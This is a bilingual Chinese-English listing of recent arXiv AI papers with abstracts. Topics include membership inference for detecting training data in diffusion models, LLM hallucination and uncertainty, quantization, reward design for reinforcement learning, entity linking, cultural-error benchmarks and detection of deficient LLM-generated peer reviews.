Tao Qi, Huili Wang, Yuanhong Huang, Wendan Wang, Lianchao Zhao, Jinrui Wang, Zichen Qin, Shangguang Wang, Yongfeng Huang

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) Tsinghua University(清华大学)

AI总结 提出一种基于跨模态数据扰动的黑盒成员推断攻击框架SD-MIA,通过分析扩散模型对目标图像和扰动文本指令的去噪过程,有效检测预训练数据中的成员关系。

Comments 13 pages, 9 figures; CVPR 2026 camera-ready

详情
AI中文摘要

基于扩散的图像生成模型的快速发展引发了对涉及人类创建数据的潜在版权和隐私侵犯的严重担忧。成员推断攻击(MIA)已成为识别模型训练期间未经授权数据使用的有前景工具。现有方法通常评估模型对扰动嫌疑图像的去噪能力作为成员状态的指标。然而,此类特征的判别能力高度依赖于模型记忆程度,并且在应用于曝光较少的数据(例如预训练数据)时显著下降。尽管有几种方法尝试通过利用模型内部特征来增强检测,但这些特征在主流闭源图像生成平台中通常不可访问,限制了其实用性。在本文中,我们证明分析黑盒扩散模型如何对目标图像和相应的扰动文本指令进行去噪可以揭示更具区分性的成员线索。基于这一见解,我们提出了一种名为SD-MIA的黑盒成员推断攻击框架,该框架利用跨模态数据扰动机制来检测扩散模型中的预训练数据。我们在一个公共基准数据集和一个新构建的数据集上进行了广泛实验,每个数据集包含具有相同分布的预训练成员和非成员样本。实验结果表明,SD-MIA相比现有基线(包括那些具有不公平访问模型内部特征优势的基线)实现了更优的性能。

英文摘要

The rapid advancement of diffusion-based image generation models has raised serious concerns regarding potential copyright and privacy infringements involving human-created data. Membership inference attacks (MIAs) have emerged as a promising tool for identifying unauthorized data usage during model training. Existing methods typically assess the ability of model to denoise perturbed suspect images as an indicator of membership status. However, the discriminative power of such features is highly dependent on the degree of model memorization and deteriorates significantly when applied to less exposed data (e.g., pre-training data). Although several methods attempt to enhance detection by leveraging internal model features, these features are generally inaccessible in mainstream closed-source image generation platforms, limiting their practicality. In this paper, we demonstrate that analyzing how a black-box diffusion model denoises a target image and corresponding perturbed textual instructions can reveal more distinctive membership cues. Based on this insight, we propose a black-box membership inference attack framework (named SD-MIA) that leverages a cross-modal data perturbation mechanism to detect pre-training data in diffusion models. We conduct extensive experiments on both a public benchmark dataset and a newly constructed dataset, each comprising pre-training membership and non-membership samples with identical distributions. Experimental results demonstrate that SD-MIA achieves superior performance compared to existing baselines, including those with the unfair advantage of accessing internal model features.

2605.27016 2026-05-27 cs.CL cs.AI cs.LG stat.ML 版本更新

Evaluating the Relevance of Uncertainty Estimators for LLM Hallucination

评估不确定性估计器与LLM幻觉的相关性

Yedidia Agnimo, Anna Korba, Annabelle Blangero, Nicolas Chesneau, Karteek Alahari

发表机构 * CREST, ENSAE Institut Polytechnique de Paris(CREST,巴黎高等理工学院) Ekimetrics France(法国Ekimetrics) Centre Inria de l’Université Grenoble Alpes(格勒诺布尔阿尔卑斯大学信息研究院)

AI总结 通过系统实证研究,评估信息论、基于采样和反思性等不确定性估计器与LLM幻觉之间的关联,发现关联性高度可变且通常较弱,挑战了将不确定性作为幻觉直接信号的做法。

Comments 35 pages, 7 figures, 9 tables

详情
AI中文摘要

大型语言模型(LLM)容易产生幻觉,即与输入或训练数据不符的陈述,阻碍了可靠部署。同时,许多不确定性估计(UE)方法被提出来量化模型置信度,并常被隐含地视为模型失败的代理。然而,不确定性与幻觉之间的关系尚未得到充分表征。我们对不确定性估计器与LLM幻觉之间的关联进行了系统的实证研究。我们不是假设这种关联,而是直接评估它在何时以及在多大程度上成立。我们考虑了多种不确定性估计器,包括信息论、基于采样和反思性估计器,并检查了它们在幻觉设置中的行为。我们的实验涵盖了内在幻觉(违反输入忠实性)和外在幻觉(相对于训练数据的无根据主张),使用了四个互补基准,包括RAGTruth和HalluLens。我们发现,这种关联性高度可变且通常较弱,取决于幻觉类型和所评估的LLM。这些结果挑战了将不确定性作为幻觉直接信号的做法,并阐明了何时它能提供可操作的信息。

英文摘要

Large language models (LLMs) are prone to hallucinations, i.e., statements unsupported by the input or training data, hindering reliable deployment. In parallel, numerous uncertainty estimation (UE) methods have been proposed to quantify model confidence and are often implicitly treated as proxies for model failure. However, the relationship between uncertainty and hallucinations remains insufficiently characterized. We present a systematic empirical study of the association between uncertainty estimators and hallucinations in LLMs. Rather than assuming this association, we evaluate directly when and to what extent it holds. We consider a diverse set of uncertainty estimators, including information-theoretic, sampling-based, and reflexive estimators, and examine their behavior across hallucination settings. Our experiments cover both intrinsic hallucinations (violations of input faithfulness) and extrinsic hallucinations (unsupported claims relative to training data), using four complementary benchmarks, including RAGTruth and HalluLens. We find that the association is highly variable and often weak, depending on the hallucination type and the LLM under evaluation. These results challenge the use of uncertainty as a direct signal of hallucination and clarify when it provides actionable information.

2605.27014 2026-05-27 cs.LO cs.AI 版本更新

ReasonOps: A Unified Operational Paradigm for Trustworthy Verified LLM Reasoning

ReasonOps: 可信验证的LLM推理的统一操作范式

Adnan Rashid

发表机构 * School of Electrical Engineering(电子工程学院) Computer Science (SEECS) National University of Sciences(计算机科学(SEECS)国家 Sciences and Technology)

AI总结 本文提出ReasonOps,一种将推理视为持续监控、可验证、可靠性感知的操作过程的统一范式,整合语义解释、自动形式化、符号推理、定理证明、运行时保证、概率可靠性估计和自适应修正,以解决当前LLM推理中的逻辑不一致、幻觉符号转换等问题。

Comments 5 Pages

详情
AI中文摘要

大型语言模型(LLM)已将人工智能从主要生成系统转变为日益强大的推理代理。最近在定理证明、自动形式化、符号推理和工具增强语言模型方面的进展表明,在机器辅助形式推理方面取得了实质性进展。然而,当前的推理系统仍然存在隐藏的逻辑不一致、幻觉符号转换、无支持的定理应用以及有限可靠性保证。现有方法在形式验证、运行时保证、神经符号推理和可信人工智能(AI)研究社区之间仍然分散。本文介绍了ReasonOps,一种用于可信验证推理系统的统一操作范式。受DevOps和MLOps等操作生态系统的启发,ReasonOps将推理视为一个持续监控、可验证、可靠性感知的操作过程,而不是一个孤立的推理任务。所提出的范式将语义解释、自动形式化、符号推理、定理证明、运行时保证、概率可靠性估计和自适应修正整合到一个统一的推理生命周期中。本文进一步介绍了ReasonOps架构,使用自主制动系统分析示例演示了其工作流程,并讨论了其在未来安全关键自主AI系统中的潜在作用。我们认为,像ReasonOps这样的操作推理范式可能成为下一代可信AI生态系统的基础设施。

英文摘要

Large Language Models (LLMs) have transformed artificial intelligence from primarily generative systems into increasingly capable reasoning agents. Recent advances in theorem proving, autoformalization, symbolic reasoning, and tool-augmented language models demonstrate substantial progress toward machine-assisted formal reasoning. However, current reasoning systems still suffer from hidden logical inconsistencies, hallucinated symbolic transitions, unsupported theorem applications, and limited reliability guarantees. Existing approaches remain fragmented across formal verification, runtime assurance, neuro-symbolic reasoning and trustworthy Artificial Intelligence (AI) research communities. This paper introduces ReasonOps, a unified operational paradigm for trustworthy verified reasoning systems. Inspired by operational ecosystems such as DevOps and MLOps, ReasonOps treats reasoning as a continuously monitored, verifiable, reliability-aware operational process rather than an isolated inference task. The proposed paradigm integrates semantic interpretation, autoformalization, symbolic reasoning, theorem proving, runtime assurance, probabilistic reliability estimation, and adaptive correction into a unified reasoning lifecycle. The paper further presents the ReasonOps architecture, demonstrates its workflow using an autonomous braking system analysis example, and discusses its potential role in future safety-critical autonomous AI systems. We argue that operational reasoning paradigms such as ReasonOps may become foundational infrastructure for next-generation trustworthy AI ecosystems.

2605.27013 2026-05-27 cs.AI 版本更新

Generating Robust Portfolios of Optimization Models using Large Language Models

使用大型语言模型生成鲁棒的优化模型组合

Eleni Straitouri, Cheol Woo Kim, Milind Tambe

发表机构 * Max Planck Institute for Software Systems(马克斯·普朗克软件系统研究所) Harvard University(哈佛大学)

AI总结 提出一种利用LLM作为随机生成器和推理评估器的统一框架,生成鲁棒的优化模型组合,并保证在生成器或评估器之一与人类偏好对齐时组合中包含高质量候选模型。

Comments Accepted at the ICML 2026 LM4Plan Workshop

详情
AI中文摘要

数学优化是跨领域(如资源分配和规划)进行结构化决策的强大工具。然而,制定忠实于现实的优化模型仍然是一个重大瓶颈,因为它通常需要领域专业知识和优化知识,而这些往往是稀缺的。最近大型语言模型(LLM)的进展有望弥合这一差距,使得从自然语言描述中生成候选优化模型成为可能。然而,无法保证任何单个LLM生成的模型是可靠的,因此仅输出一个模型的现有方法存在风险。在这项工作中,我们提出了一种新颖的算法,生成一个优化模型组合,旨在对LLM的局限性具有鲁棒性。我们的方法利用了一个观察:单个LLM可以扮演两个不同的角色——作为随机生成器和作为推理评估器——并提出了一个统一的框架,以互补的方式利用这两种能力。我们提供了理论保证,表明只要生成器或评估器中至少有一个与人类偏好良好对齐,该组合就保证包含高质量的候选模型,从而实现一个原则性的人机交互过程,决策者可以在承诺使用一个模型之前审查多个候选模型。我们进一步通过实验验证了我们的方法,展示了在一系列优化建模任务中的强大性能。

英文摘要

Mathematical optimization is a powerful tool for structured decision-making across domains such as resource allocation and planning. Formulating optimization models faithful to reality, though, remains a significant bottleneck as it typically demands both domain expertise and optimization knowledge that are often scarce. Recent advances in large language models (LLMs) promise to bridge this gap, enabling the generation of candidate optimization models from natural language descriptions. However, there is no guarantee that any single LLM-generated model is reliable, and existing approaches that output only one model are therefore risky. In this work, we propose a novel algorithm that generates a portfolio of optimization models, designed to be robust to the limitations of LLMs. Our method exploits the observation that a single LLM can play two distinct roles $\unicode{x2014}$ as a stochastic generator and as a reasoning evaluator $\unicode{x2014}$ and proposes a unified framework that leverages both capabilities in a complementary manner. We provide theoretical guarantees showing that, as long as either the generator or the evaluator is well-aligned with human preferences, the portfolio is guaranteed to contain high-quality candidates, enabling a principled human-in-the-loop process in which a decision-maker can review multiple candidates before committing to one. We further validate our approach empirically, demonstrating strong performance across a range of optimization modeling tasks.

2605.27003 2026-05-27 cs.CV cs.AI 版本更新

Timestep-Aware SVDQuant-GPTQ for W4A4 Quantization of Wan2.2-I2V

时间步感知的 SVDQuant-GPTQ 用于 Wan2.2-I2V 的 W4A4 量化

Junhao Wu, Dezhong Yao, Hai Jin

发表机构 * National Engineering Research Center for Big Data Technology and System(大数据技术与系统国家工程研究中心) Services Computing Technology and System Lab(服务计算技术与系统实验室) Cluster and Grid Computing Lab(集群与网格计算实验室) School of Computer Science and Technology(计算机科学与技术学院) Huazhong University of Science and Technology(华中科技大学)

AI总结 针对 Wan2.2-I2V 视频扩散 Transformer 的 W4A4 量化,提出结合 SVDQuant 低秩异常补偿、GPTQ 重建感知残差权重量化和时间步分箱逐层激活裁剪比搜索的后训练量化框架,在 OpenS2V-Eval 上降低 59.3% 峰值显存且仅损失 0.9% VBench 平均分。

详情
AI中文摘要

大型视频扩散 Transformer 的 W4A4 量化提供了显著的内存节省,但面临两个主要挑战:稀疏的大幅度激活异常值,以及跨多步去噪轨迹的强时间步依赖的激活分布。这些困难因 Wan2.2-I2V 的双专家混合专家 DiT 设计而加剧,其高噪声和低噪声专家表现出不同的量化敏感性,单一全局校准策略无法捕捉。我们提出了一种后训练量化框架,结合基于 SVDQuant 的低秩异常补偿、基于 GPTQ 的重建感知残差权重量化,以及针对每个专家独立进行的时间步分箱逐层激活裁剪比搜索。在 OpenS2V-Eval 基准上,我们的方法相对于 BF16 基线将峰值 GPU 内存降低了 59.3%,同时仅导致 VBench 平均分数下降 0.9%,成像质量下降 2.3%,表明专家和时间步感知的校准对于 MoE 视频 DiT 的高保真 W4A4 推理至关重要。

英文摘要

W4A4 quantization of large video diffusion Transformers offers substantial memory savings but is hindered by two main challenges: sparse large-magnitude activation outliers, and strongly timestep-dependent activation distributions across the multi-step denoising trajectory. These difficulties are compounded by Wan2.2-I2V's two-expert Mixture-of-Experts DiT design, whose high-noise and low-noise experts exhibit distinct quantization sensitivities that a single global calibration policy cannot capture. We propose a post-training quantization framework combining SVDQuant-based low-rank outlier compensation, GPTQ-based reconstruction-aware residual weight quantization, and timestep-bin-wise per-layer activation clipping-ratio search conducted independently for each expert. On the OpenS2V-Eval benchmark, our method reduces peak GPU memory by 59.3\% relative to the BF16 baseline while incurring only a 0.9\% drop in VBench average score and a 2.3\% drop in Imaging Quality, demonstrating that expert- and timestep-aware calibration is essential for high-fidelity W4A4 inference on MoE video DiTs.

2605.26969 2026-05-27 cs.CL cs.AI 版本更新

Recon: Reconstruction-Guided Reasoning Synthesis for User Modeling

Recon:基于重建指导的推理合成用于用户建模

Alan Zhu, Mihran Miroyan, Carolyn Wang, Andrew Zhou, Lisa Dunlap, Narges Norouzi, Joseph E. Gonzalez

发表机构 * University of California, Berkeley(加州大学伯克利分校)

AI总结 提出Recon方法,通过动作重建分数评估推理轨迹的预测能力,以改进用户建模中的推理合成,在多个领域优于事后合理化基线。

详情
AI中文摘要

用户建模旨在使用语言模型(LM)从过去的上下文-动作对(例如对话轮次)语料库中模拟个体的行为,从而在行为科学、人机协作和市场研究等环境中模拟用户。最近的方法通过合成推理轨迹来扩充这些语料库,通常通过同时以上下文和动作为条件生成。然而,这种条件构成事后合理化而非推理:轨迹保证证明动作的合理性,但可能不编码潜在的潜在因果决策路径。我们提出Recon,它使用动作重建通过预测能力对推理轨迹进行评分:给定上下文和候选推理,重建模型预测动作,重建保真度决定推理质量。在四个领域,Recon相对于标准事后合理化基线Backward Synthesis实现了54.7%的胜率。此外,我们发现使用来自Recon的奖励训练推理合成模型可提高下游用户建模性能,相对于基线实现了高达70.0%的胜率。我们进一步表明,Recon合成的推理可跨模型迁移,并改善重建模型之外的用户建模。我们的工作表明,事后合理化对于推理合成是不够的,有用且可解释的推理应自然地从上下文中引出动作。

英文摘要

User modeling aims to use language models (LMs) to mimic an individual's behavior from a corpus of past context-action pairs (e.g., conversation turns), enabling the simulation of users in settings like behavioral science, human-AI collaboration, and market research. Recent approaches augment these corpora with synthesized reasoning traces, typically generated by conditioning on both context and action. However, such conditioning constitutes post-hoc rationalization rather than reasoning: the trace is guaranteed to justify the action, but may not encode the underlying latent causal decision paths. We propose Recon, which uses action reconstruction to score reasoning traces by their predictive power: given a context and candidate reasoning, a reconstruction model predicts the action, and reconstruction fidelity determines reasoning quality. Across four domains, Recon achieves a 54.7% win rate over Backward Synthesis, a standard post-hoc rationalization baseline. Further, we find that training a reasoning synthesis model with rewards derived from Recon improves downstream user modeling performance, achieving a win rate of up to 70.0% over baselines. We further show that Recon-synthesized reasoning transfers across models, and improves user modeling beyond the reconstruction model. Our work demonstrates that post-hoc rationalization is insufficient for reasoning synthesis, and that useful and interpretable reasoning should naturally elicit the action from the context.

2605.26958 2026-05-27 cs.CL cs.AI 版本更新

Tournament-GRPO: Group-Wise Tournament Rewards for Reinforcement Learning in Open-Ended Long-Form Generation

Tournament-GRPO:面向开放式长文本生成强化学习的群组锦标赛奖励

Zixuan Yang, Yiqun Chen, Wei Yang, Erhan Zhang, Zihan Shen, Xiaochi Wei, Yan Gao, Yi Wu, Yao Hu, Jiaxin Mao

发表机构 * Renmin University of China(中国人民大学) University of Southern California(南加州大学) Zhejiang University(浙江大学) Xiaohongshu Inc.(小红书公司)

AI总结 针对开放式长文本生成中缺乏可靠参考答案和自动评估指标的问题,提出Tournament-GRPO框架,通过同一查询生成结果间的多轮锦标赛比较将基于规则的LLM评判转化为相对奖励,在Deep Research Bench上取得4.52分提升。

详情
AI中文摘要

开放式长文本生成中的强化学习具有挑战性,因为可靠的参考答案和自动评估指标通常不可用。现有的基于规则的方法通常依赖于逐点的LLM作为评判的评分,但绝对分数难以在复杂响应间校准,可能对同一查询的生成结果提供弱区分度,并在优化过程中饱和。我们提出Tournament-GRPO,一种群组奖励框架,通过同一查询生成结果间的重复多轮锦标赛将基于规则的LLM评判转化为相对奖励。Tournament-GRPO在群组内比较候选结果,累积锦标赛结果,并将其归一化为用于GRPO训练的群组奖励。在Deep Research Bench上的实验表明,Tournament-GRPO持续优于现有的奖励设计基线,在最强基线上实现了4.52分的整体分数提升。进一步分析表明,锦标赛奖励提供了有利的有效性-效率权衡,并且锦标赛设计影响训练动态。这些结果表明,基于规则的锦标赛比较为开放式长文本生成中的强化学习提供了有效的奖励信号。

英文摘要

Reinforcement learning in open-ended long-form generation is challenging because reliable reference answers and automatic metrics are often unavailable. Existing rubric-based methods typically rely on pointwise LLM-as-a-judge scoring, but absolute scores are difficult to calibrate across complex responses, may provide weak discrimination among same-query rollouts, and can become saturated during optimization. We propose Tournament-GRPO, a group-wise reward framework that converts rubric-guided LLM judgments into relative rewards through repeated multi-round tournaments among same-query rollouts. Tournament-GRPO compares candidates within groups, accumulates tournament outcomes, and normalizes them into group-wise rewards for GRPO training. Experiments on Deep Research Bench show that Tournament-GRPO consistently outperforms existing reward-design baselines, achieving a 4.52-point overall-score improvement over the strongest baseline. Further analyses show that tournament rewards provide a favorable effectiveness--efficiency trade-off and that tournament design affects training dynamics. These results suggest that rubric-guided tournament comparison provides an effective reward signal for reinforcement learning in open-ended long-form generation.

2605.26956 2026-05-27 cs.AI cs.CL 版本更新

LELA: An End-to-end LLM-based Entity Linking Framework with Zero-shot Domain Adaptation

LELA: 一种基于LLM的端到端实体链接框架,支持零样本领域自适应

Samy Haffoudhi, Nikola Dobričić, Fabian Suchanek, Nils Holzenberger

AI总结 本文提出LELA,一种基于大语言模型的模块化、领域无关的实体消歧方法,并扩展为实用的Python库,集成零样本命名实体识别,实现端到端实体链接,实验验证其跨领域性能与鲁棒性。

详情
Journal ref
35th International Joint Conference on Artificial Intelligence (IJCAI-ECAI 2026), IJCAI (International Joint Conferences on Artificial Intelligence), Aug 2026, Bremen (DE), Germany
AI中文摘要

实体链接是许多下游NLP系统的关键组件,但现有方法通常依赖于特定的目标知识库和领域,限制了其实际应用。在本文中,我们将LELA(一种模块化且领域无关的基于LLM的实体消歧方法)扩展为一个实用的Python库,该库集成了零样本命名实体识别(NER),从而为实际使用中的实体链接提供了完整的端到端流水线。我们提供了实验结果,验证了LELA在不同实体链接设置下的性能和鲁棒性。在我们的演示中,用户可以在自己的输入文本上试用该系统。

英文摘要

Entity linking is a key component of many downstream NLP systems, yet existing approaches are often tied to the specific target knowledge bases and domains, limiting their real world application. In this paper, we extend LELA, a modular and domain-agnostic LLM-based entity disambiguation method, into a practical Python library that integrates zero-shot Named Entity Recognition (NER) -thereby providing a complete end-toend pipeline for entity-linking in real-world usage. We provide experimental results validating LELA's performance and robustness across diverse entity linking settings. In our demo, users can play with the system on their own input texts.

2605.26955 2026-05-27 cs.CL cs.AI 版本更新

JuICE: A Benchmark for Evaluating LLM-Judge in Identifying Cultural Errors

JuICE:评估LLM裁判识别文化错误的基准

Jiho Jin, Junho Myung, Juhyun Oh, Junyeong Park, Rifki Afina Putri, Sunipa Dev, Vinodkumar Prabhakaran, Alice Oh

发表机构 * KAIST(韩国科学技术院) Google(谷歌) Universitas Gadjah Mada(加查马达大学)

AI总结 提出JuICE基准,包含7470个文化语言错误标注的多语言数据集,用于评估LLM裁判在长文本中识别深层文化错误的能力,发现最强模型F1仅0.52且常遗漏本地人易识别的错误。

详情
AI中文摘要

随着大型语言模型(LLM)越来越多地部署给全球用户,它们被整合到不同文化背景下的日常任务中,从起草个人通信到头脑风暴创意想法。这些任务本质上是文化性的:它们需要语境适当性、象征共鸣以及母语者本能依赖的隐性文化期望,这意味着一个回答可能在事实上合理,但对本地读者来说却明显错误。现有的文化基准通过事实验证或规范蕴含方法将文化视为一组扁平的事实,并采用LLM作为裁判,而未检查它们是否能捕捉到这种深层的文化错误。为填补这一空白,我们提出了JuICE(LLM裁判识别文化错误基准),这是一个多语言数据集,包含7470个跨度级别的文化语言错误标注,涵盖来自四个国家(美国、韩国、印度尼西亚和孟加拉国)的1050个查询-响应对,使用英语和这些国家的主要语言。利用JuICE,我们发现即使是最强的LLM裁判在错误跨度检测任务中也仅达到0.52的F1分数。此外,LLM裁判始终会遗漏本地居民容易识别的深层文化错误。我们的研究结果表明,稳健的文化评估必须超越表面级别的检测,转向考虑文化意义的深度和情境性的框架。

英文摘要

As large language models (LLMs) are increasingly deployed to users around the world, they are integrated into everyday tasks across diverse cultural contexts, from drafting personal communications to brainstorming creative ideas. These tasks are inherently cultural: they require contextual appropriateness, symbolic resonance, and tacit cultural expectations that native speakers draw on instinctively, meaning that a response can be factually plausible yet unmistakably wrong to a local reader. Existing cultural benchmarks have treated culture as a flat set of facts via fact verification or norm entailment methods, and have adopted LLM-as-a-Judge without examining whether they can capture such thick cultural errors. To address this gap, we present JuICE (Benchmark for LLM-Judge in Identifying Cultural Errors), a multilingual dataset of 7,470 span-level annotations of cultural and linguistic errors in long-form LLM responses. It covers 1,050 query-response pairs from four countries (the United States, South Korea, Indonesia, and Bangladesh), in both English and their countries' main languages. Using JuICE, we find that even the strongest LLM-judge achieves only an F1 of 0.52 in the erroneous span detection task. Furthermore, LLM-judges consistently miss thick cultural errors that local residents readily identify. Our findings suggest that robust cultural evaluation must move beyond surface-level detection toward frameworks that account for the depth and situatedness of cultural meaning.

2605.26937 2026-05-27 cs.CL cs.AI 版本更新

Beyond Questions: Evaluating What Large Language Models (Actually) Know

超越问题:评估大型语言模型(实际)知道什么

Luca Giordano, Simon Razniewski

发表机构 * ScaDS.AI Dresden/Leipzig & TU Dresden, Germany(ScaDS.AI 德尔布兰德/莱比锡及德累斯顿技术大学,德国)

AI总结 提出开放知识评估新范式,通过开放式提示(如“告诉我关于M.L. King的一切”)评估模型自然表达的知识,并构建BeQu基准测试10,000个实体。

详情
AI中文摘要

大型语言模型(LLM)中的参数化知识是其成功的基石,但仍未被充分理解。现有的知识基准通常依赖于预定义的问题(例如,“M.L. King的出生日期是什么?”),仅评估基准设计者明确选择查询的知识,这是一种有问题的可用性偏差。在本文中,我们引入了开放知识评估,这是一种用于LLM知识基准测试的新范式。它不提出狭隘的问题,而是评估模型在响应开放式引发提示(例如,“告诉我关于M.L. King的一切”)时选择呈现的知识。这将焦点从预定义的答案检索转向表征模型自然表达的知识。我们用BeQu(超越问题)实例化这一范式,这是一个包含10,000个实体并配有用于陈述验证的参考语料库的基准。使用BeQu,我们评估了广泛的语言模型,并分析了推理努力、模型规模、提示格式和知识领域的影响。数据和排行榜可在此工作的GitHub仓库和基准网站上获取。

英文摘要

Parametric knowledge in large language models (LLMs) is a cornerstone of their success, yet remains poorly understood. Existing knowledge benchmarks typically rely on predefined questions (e.g., "What is the birth date of M.L. King?"), evaluating only knowledge that benchmark designers explicitly choose to query, a problematic availability bias. In this paper, we introduce open knowledge evaluation, a new paradigm for LLM knowledge benchmarking. Instead of asking narrow questions, it evaluates models on the knowledge they choose to surface in response to open-ended elicitation prompts (e.g., "Tell me everything you know about M.L. King"). This shifts the focus from predefined answer retrieval toward characterizing the knowledge models naturally express. We instantiate this paradigm with BeQu (Beyond Questions), a benchmark of 10,000 entities paired with reference corpora for statement verification. Using BeQu, we evaluate a broad range of language models and analyze the effects of reasoning effort, model scale, prompt format, and knowledge domain. Data and leaderboard are available on this work's GitHub repository and at the benchmark's website.

2605.26934 2026-05-27 cs.CL cs.AI 版本更新

Reasoning Depth and Environment Complexity: A Controlled Study of RLVR Data Allocation across Logical Reasoning Tasks

推理深度与环境复杂度:逻辑推理任务中RLVR数据分配的受控研究

Yihua Zhu, Qianying Liu, Fei Cheng, Jiaxin Wang, Akiko Aizawa, Sadao Kurohashi, Hidetoshi Shimodaira

发表机构 * Kyoto University(京都大学) University of Tokyo(东京大学) NII LLMC(日本信息处理学会LLMC) RIKEN(理化学研究所)

AI总结 通过将推理空间划分为深度和复杂度两个维度,并考虑四种推理形式,在合成知识图谱环境中进行受控实验,发现联合深度-复杂度覆盖优于单轴策略,不同推理家族对RLVR覆盖的反应非均匀,且均匀混合优于分阶段课程。

Comments Pre-print

详情
AI中文摘要

基于可验证奖励的强化学习(RLVR)已成为后训练推理模型的核心,但现有研究的一个关键局限在于对推理空间的狭隘视角:难度仅被视为推理深度,奖励集中在正向演绎状态追踪。相反,我们沿两个维度刻画推理空间。难度:除了推理深度,我们研究环境复杂度,即模型必须在干扰项和交互结构中识别正确路径。奖励推理形式:我们考虑现实世界推理核心的四种能力:演绎状态追踪、对隐藏事件或事实的溯因恢复、归纳规则归纳以及类比迁移。为解耦这些因素,我们构建了一个合成知识图谱环境,具有受控的预训练和后训练分布,其中每个实例在深度、复杂度和任务家族上变化。三个发现:联合深度-复杂度覆盖优于单轴策略;推理家族反应非均匀,溯因推理在RL覆盖区域外退化,任务相关性聚类为演绎-溯因对和归纳-类比对;在固定预算下,均匀混合优于分阶段课程。我们还发现,最近的现成模型表现出相同的演绎-溯因不对称性,表明这一差距并非我们受控设置的假象。

英文摘要

Reinforcement learning with verifiable rewards (RLVR) has become central to post-training reasoning models, yet a key limitation of existing studies is their narrow view of the reasoning space: difficulty is treated as reasoning depth alone, and reward is concentrated on forward deductive state tracking. We instead characterize the reasoning space along two dimensions. Difficulty. Beyond reasoning depth, we study environment complexity, where models must identify the correct path amid distractors and interacting structures. Rewarded reasoning form. We consider four abilities core to real-world reasoning: deductive state tracking, abductive recovery of hidden events or facts, inductive rule induction, and analogical transfer. To disentangle these factors, we construct a synthetic knowledge-graph environment with controlled pre- and post-training distributions, where each instance varies along depth, complexity, and task family. Three findings emerge: joint depth-complexity coverage outperforms single-axis recipes; reasoning families respond non-uniformly, with abductive reasoning degrading outside the RL-covered region and task correlations clustering into deductive-abductive and inductive-analogy pairs; and uniform mixing outperforms staged curricula under a fixed budget. We also find that recent off-the-shelf models exhibit the same deductive-over-abductive asymmetry, suggesting that this gap is not merely an artifact of our controlled setup.

2605.26926 2026-05-27 cs.AI 版本更新

From Norms to Indicators (N2I-RAG): An Agentic Retrieval-Augmented Generation Framework for Legal Indicator Computation

从规范到指标 (N2I-RAG): 一种用于法律指标计算的智能检索增强生成框架

Youssef Al Mouatamid, Marie Bonnin, Jihad Zahir

发表机构 * LISI Laboratory(LISI实验室) Cadi Ayyad University(卡迪·阿亚德大学) Univ Brest(布列塔尼大学) IRD, Univ Brest, CNRS, Ifremer, LEMAR(IRD、布列塔尼大学、CNRS、Ifremer、LEMAR)

AI总结 提出N2I-RAG框架,通过自适应检索、基于LLM的智能体和验证机制,实现从法律文本到指标的透明、可追溯的自动计算,在法国海洋环境法语料库上优于基线方法。

详情
AI中文摘要

从规范文本计算法律指标是法律监测和政策评估中的关键任务,但由于法律语言的复杂性、规模、解释性以及可用文档质量的差异,这一任务面临重大挑战。现有的自然语言处理技术和生成模型可以辅助法律分析,但往往存在较高的幻觉风险,且缺乏可靠指标计算所需的可解释性和证据基础。本文提出N2I-RAG(从规范到指标),一种智能检索增强生成框架,旨在以透明且可追溯的方式自动化法律指标的计算。我们将自适应检索、基于LLM的智能体和验证机制集成到一个模块化流水线中,其中每个组件在过滤、检索和评估证据,以及生成与可识别法律条款相关的二元法律结果方面执行定义明确的角色。该框架通过要求对中间决策和最终指标分配进行明确解释来强调可追溯性。我们使用内部构建的包含扫描和数字两种来源的法国海洋环境法律语料库评估N2I-RAG。与多个语言模型家族的对比实验表明,所提出的方法始终优于基线系统,并且在两种不同禁令的测试中具有良好的泛化能力。结果表明,智能检索增强生成可以桥接开放文本法律语言和标准化指标计算,为透明且可扩展的法律观测站奠定基础。

英文摘要

Computing legal indicators from normative texts is a key task in legal monitoring and policy evaluation, but presents significant challenges due to the complexity, scale, and interpretive nature of legal language, as well as the variability in available document quality. Existing natural language processing techniques and generative models can assist in legal analysis, but often suffer from high risk of hallucinations and lack the interpretability and evidence grounding required for reliable indicator computation. This paper presents N2I-RAG (From Norms to Indicators), an agentic retrieval-augmented generation framework designed to automate the computation of legal indicators in a transparent and traceable way. We integrate adaptive retrieval, llm-based agents, and validation mechanisms in a modular pipeline, where each component performs a defined role in filtering, retrieving, and assessing evidence, and in producing binary legal outcomes linked to identifiable legal provisions. The framework emphasizes traceability by requiring explicit explanations of intermediate decisions and final indicator assignments. We evaluate N2I-RAG using an in-house constructed French marine environmental law corpus that includes both scanned and digital sources. Comparative experiments with multiple language model families demonstrate that the proposed approach consistently outperforms baseline systems, and generalizes well when tested on 2 different bans. The results indicate that agentic retrieval-augmented generation can bridge open-text legal language and standardized indicator computation, offering a foundation for transparent and scalable legal observatories.

2605.26911 2026-05-27 cs.AI 版本更新

TADDLE: A Tool-Augmented Agent for Detecting Deficient LLM-Generated Peer Reviews

TADDLE: 一种用于检测有缺陷的LLM生成同行评审的工具增强型代理

Hanqi Duan, Xiang Li

发表机构 * East China Normal University(东华大学)

AI总结 针对LLM生成的同行评审难以检测缺陷的问题,提出TADDLE工具增强型代理,通过四个专用分析工具和两阶段半监督学习,在二元检测和多标签分类任务上表现优异。

详情
AI中文摘要

LLM生成的同行评审在主要会议中越来越常见,但由于它们语言流畅、结构良好,其缺陷难以检测。现有工作要么仅分类作者身份而不评判质量,要么使用为人类撰写的评审设计的特征来评分质量;没有先前系统能在单个缺陷类型级别检测LLM生成评审中的缺陷。为弥补这一空白,我们引入了TADDLE,一种用于检测有缺陷的LLM生成同行评审的工具增强型代理,以及首个针对此任务的专家标注基准。我们的基准包含对50篇ICLR 2025论文的1800条评审,由18位领域专家根据六个缺陷类别(加上一个无缺陷标签)的分类法进行多标签标注。TADDLE将检测分解为四个专用分析工具——验证、纠正、完善和转换——由一个代理协调;一个集成器通过两阶段半监督学习将其输出综合为二元和多标签分类。大量实验表明,TADDLE在二元检测和多标签分类任务上均表现强劲。我们在https://github.com/AquariusAQ/TADDLE发布基准和代码。

英文摘要

